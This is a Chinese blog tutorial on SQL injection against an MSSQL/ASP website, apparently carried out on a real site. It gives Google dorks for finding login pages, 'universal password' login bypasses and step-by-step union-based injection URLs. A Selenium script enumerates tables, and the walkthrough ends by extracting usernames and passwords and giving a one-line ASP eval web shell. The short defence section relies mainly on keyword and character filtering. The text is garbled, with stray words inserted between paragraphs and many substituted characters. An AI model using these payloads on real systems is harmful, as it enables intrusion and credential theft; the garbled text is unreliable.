[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入

这是最近本身学习渗透和网站攻防的文章,但愿能深刻地学习这部分知识,同时认了Na师傅和Rong师傅,知道了人外有人、天外有天,真的很享受这种探索问题、解决问题和分析知识的过程。但愿文章对你有所帮助,尤为是学习网站如何防止SQL注入及数据库原理的初学者或安全工程师。若是文章中存在错误或不足之处,还请海涵~
python

    一.Google搜索知识
    二.万能密码原理
    三.数据库解读SQL注入攻防原理
        1.数据库如何判断注入点
        2.数据库如何判断字段总数 order by
        3.数据库获取显示位 union
        4.数据库显示错误网页及对应数据 db_name
        5.数据库获取表名及列名,Python爬虫引入
        6.数据库获取登陆表usr字段 id=object_id('usr')
        7.数据库返回用户名和密码 
        8.登陆系统并获取WebShell
    四.防SQL注入措施及建议
程序员


一. Google搜索知识


Google提供了强大的搜索功能,能够获取精准的结果。若是访问不了,也能够经过百度获取相关内容,可是结果远没有谷歌精准,不少无关的广告及视频会返回给你。
方法以下:

intitle:eastmount

搜索网页标题包含eastmount字符的网页。


inurl:cbi
搜索包含特定字符cbi的URL。

intext:cbi
搜索网页正文内容包含特定字符cbi的网页。

filetype:ppt
搜索制定类型的文件,返回全部以ppt结尾的文件URL。

site
找到与指定网站有联系的URL。

经常使用示例:inurl:login.asp、inurl:asp?id=、inurl:login.asp intilte:贵州




二. 万能密码原理

万能密码一般是指开发人员在开发过程当中使用超级管理员进行开发,开发完成后没有过滤掉这些经常使用的超级管理员;另外一种是存在SQL漏洞管理员帐号。下面分别进行讨论:web

1.万能密码:用户名 admin、密码admin,用户名admin、密码123456正则表达式

2.万能密码:用户名 'or'='or'、密码 'or'='or'
   原理解释:假设用户登陆对应的语句为:
   select name, pwd from login where name='' and pwd='';
   若是用户名输入正确则直接登陆,不然提示用户名或密码错误,使用万能密码后的SQL语句以下:
   select name, pwd from login where name=''or'='or'' and pwd=''or'='or'';
   核心代码,两个单引号匹配,即name='',而后or链接,单引号等于单引号('=')这是恒成立的,紧接着or链接两个单引号(''),同理密码pwd。这样or链接的('=')是恒成立的,故返回结果为真,致使直接登陆。
数据库

3.万能密码:用户名 'or''='、密码'or''='
   原理解释:此时对应的SQL语句以下:
   select name, pwd from login where name=''or''='' and pwd=''or''='';
安全

4.万能密码:用户名'or'='--、密码'or'='--
   原理解释:此时对应的SQL语句以下:
   select name, pwd from login where name=''or'='--' and pwd=''or'='--';
服务器


经过如 inurl:login.asp 等搜索技术找到一些列网站后台登陆界面后,反复尝试这些万能密码进行登陆。防范措施也比较简单:
网络

1.开发人员开发完成后,过滤掉admin等经常使用帐号或修改密码;
2.当用户第一次登陆的时候,对简单的密码进行修改提示,防止暴力破解;
3.用户名或密码屏蔽掉单引号(')、等号(=)、注释(--)等特殊字符;
4.对尝试SQL注入的IP地址进行报警提示或日志记录。



jsp

三. 数据库解读SQL注入攻防原理

下面经过一个简单的例子从数据库原理知识解读SQL注入攻防原理,内容比较简单,但但愿假设存在一个网址能正常显示内容
http://xxxxx/show.asp?code=115
对应的后台SQL语句可能以下:
select .... from table where code='115' and xxxx;
函数


1.数据库如何判断注入点

判断注入点的方法不少,好比show.asp?code=115' 加单引号,show.asp?code=115-1 减1,这里介绍一个经典的方法。
(1) http://xxxxx/show.asp?code=115' and 1=1 --       (正常显示)
对应的SQL语句:
select .... from table where code='115' and 1=1 -- and xxxx;
单引号(')匹配code='115,而后and链接,1=1恒成立,注释(--)掉后面语句。

(2) http://xxxxx/show.asp?code=115' and 1=2 --       (错误显示)
对应的SQL语句:
select .... from table where code='115' and 1=2 -- and xxxx;
单引号(')匹配code='115,而后and链接,1=2恒错误,注释(--)掉后面语句。

2.数据库如何判断字段总数 order by

(1) http://xxxxx/show.asp?code=115' order by 1 --    (正常显示)
对应的SQL语句:
select .... from table where code='115' order by 1 -- and xxxx;
按照1个字段进行排序,正常显示表示该URL对应的SQL语句至少一个字段。

(2) http://xxxxx/show.asp?code=115' order by 10 --  (正常显示)
对应的SQL语句:
select .... from table where code='115' order by 10 -- and xxxx;
依次按照字段增长网上进行排序,若是提示错误order by 11,则表示共10个字段。

(3) http://xxxxx/show.asp?code=115' order by 11 --  (错误显示)
 


3.数据库获取显示位 union

在获得字段个数后,须要获取字段位置,则使用union或union all。其中union表示将两个select结果总体显示,并合并相同的结果,union all显示所有结果。例如:


(1)  http://xxxxx/show.asp?code=115' union all select null,...,null --  
正常显示,共10个null,表示通配符,若是9个null会报错,需对应10个字段。

(2) http://xxxxx/show.asp?code=115' union all select 1,...,null --  
依次替换成数字,测试哪几个字段有结果,若是报错则替换回null。最终的结果为:
show.asp?code=115' union all select 1,null,3,null,null,6,7,8,9,10 --
对应的SQL语句为:
select .... from table where code='115' union all select 1,null,3,null,null,6,7,8,9,10 -- xxxx;

(3) http://xxxxx/show.asp?code=-1' union all select 1,...,null --  
而后将数字115替换成-1,一个不存在的界面,则会显示以下所示结果,能够看到附件显示对应的值七、八、9,再想办法将咱们须要的结果在这里显示便可,这些数据都是从后台数据库中查询出来的。


4.数据库显示错误网页及对应数据 db_name

该网站使用的数据库为MSSQL,则必定特定的字段须要知道:
   host_name():链接数据库服务器的计算机名称
   @@version:获取数据库版本号
   db_name():数据库的库名称
   @@servername:当前数据库计算机的名称=host_name()

(1) http://xxxxx/show.asp?code=-1' union all
select 1,null,3,null,null,6,host_name(),@@version,db_name(),10 -- 
 
输出结果以下所示:
    附件1:AYD
    附件2:Microsoft SQL Server....
    附件3:ahykd_new
其中数据库的名称就是ahykd_new,接下来相同的道理获取数据库全部表及列。

5.数据库获取表名及列名,Python爬虫引入

SQL Server自带系统对象表,当前数据库全部字段。
    sysobjects 表名
    syscolumns 列名
其中,name表示对象名(表名),id表示表编号,type表示对象类型,其值为U表示用户表,S表示系统表,C约束,PK主键等。
sysobjects 和 syscolumns 之间以id互相对应,一个表名在sysobjects获得id后能够在syscolumns找到它的列名。
重点知识:
a.查看全部表名语句
select name from sysobjects where type='U';
b.询表table1的全部字段名称
select name from syscolumns where id=object_id('table1');

(1) http://xxxxx/show.asp?code=-1' union all 
select 
1,null,3,null,null,6,7,8,
(select top 1 name from sysobjects where type='U'),10 --
输出结果以下所示: 

    附件1:7
    附件2:8
    附件3:kc_jxjd
其中top 1 name用于输出1个字段(至关于MySQL使用limit 1),sysobjects中u为用户表,count(*)能够统计总共87个表。
问题:如今是获取1个表,那么如何获取其余表呢?

(2) http://xxxxx/show.asp?code=-1' union all 
select 
1,null,3,null,null,6,7,8, (select top 1 name from
(select top 2 name from sysobjects where type='U' order by desc) a
order by 1 asc),10 --

经过子查询一个升序,一个降序获取第二个值,同理第三个top 3。
下面经过Python定义一个爬虫不断访问top n,获取全部的表名,代码以下:

# coding=utf-8
from selenium import webdriver             
driver = webdriver.Firefox()    

#查询表的名字
#(select top 1 name from (select top " + str(i) +" name from sysobjects where xtype='u' order by 1 asc)a order by 1 desc)
i = 1
while i<=87:
    url = "http://...tztgxx.aspx?code=-115' union all select 1,null,1,null,null,6,host_name(),@@servername,(select top 1 name from (select top " + str(i) +" name from sysobjects where xtype='u' order by 1 asc)a order by 1 desc),10 --"
    #print url
    driver.get(url)
    elem = driver.find_element_by_xpath("//form[@name='form1']/div[2]/table/tbody/tr[7]")
    print elem.text
    i = i + 1
分析输出的全部表名,能够发现usr为后台登陆表。

6.数据库获取登陆表usr字段 id=object_id('usr')

(1) http://xxxxx/show.asp?code=-1' union all 
select 
1,null,3,null,null,6,7,8,
(select top 1 name from syscolmns where id=object_id('usr')),10 --

输出结果以下所示: 
    附件1:7
    附件2:8
    附件3:answer
其中top 1 name用于输出1个字段,表usr的一个列表。

(2) 核心SQL语句获取不一样的列名:
(select top 1 name from (select top 3 name from syscolumns where id=object_id('usr') order by asc) a order by 1 desc)
输出结果以下所示: 
    附件1:7
    附件2:8
    附件3:dic_roll
同理,也能够借助Python获取全部字段,若是字段少,手工便可测试出来,count(*)返回字段个数。最后发现,用户名为usr_name,密码为passwd。

7.数据库返回用户名和密码 

(1) http://xxxxx/show.asp?code=-1' union all 
select 
1,null,3,null,null,6,7,8,(select top 1 usr_name from usr),10 --
输出结果以下所示: 
    附件1:7
    附件2:8
    附件3:2016001
输出用户名2016001,在搜索密码。

(2) http://xxxxx/show.asp?code=-1' union all 
select 
1,null,3,null,null,6,7,8,
(select passwd  from usr where usr_name='2016001'),10 --

输出结果以下所示: 
    附件1:7
    附件2:8
    附件3:123456
输出用户名2016001,密码123456,此时便可登陆,经过Python能够获取全部值。


8.登陆系统并获取WebShell

登陆后台基本完成,下面将讲解如何进行SQL防护。
PS:<%eval request("Nana") %>


四. 防SQL注入措施及建议

上面经过数据库原理进行了详细的讲解,这种网站基本不多存在了,几乎为0,更多的网页都有相关的屏蔽的。好比:
1.在URL设置不容许非法字符,如单引号、等号、注释--、减号,提示非法参数;

2.在URL设置不容许SQL常见的关键词,如and、select、or、insert等;

3.传递的id=115参数必须为数字才能正常跳转,不然跳转错误,以下图所示:

4.服务器启用SQL注入拦截功能,提示当前网页的 URL / POST / COOKIES中包含了特定的 SQL字符而被防火墙拦截,由于可能经过POST、Cookies进行攻击。各方面都须要作到防护。


5.可使用Javascript在客户端进行不安全字符屏蔽,也能够在jsp中调用该函数检查是否包函非法字符,或使用正则表达式过滤传入的参数,防止SQL从URL注入。


但愿文章对你有所帮助,尤为是网络安全的程序员,若是文章存在错误或不足之处,还请海涵。感谢娜师傅的一路陪伴,学中文的扔掉了手中的尤克里里,教我写代码也是很疯狂的啊,哈哈!不忘初心,继续前行。加油,秀璋。绿妖,晚安!
(By:Eastmount 2017-07-13 晚上12点  http://blog.csdn.net/eastmount/ )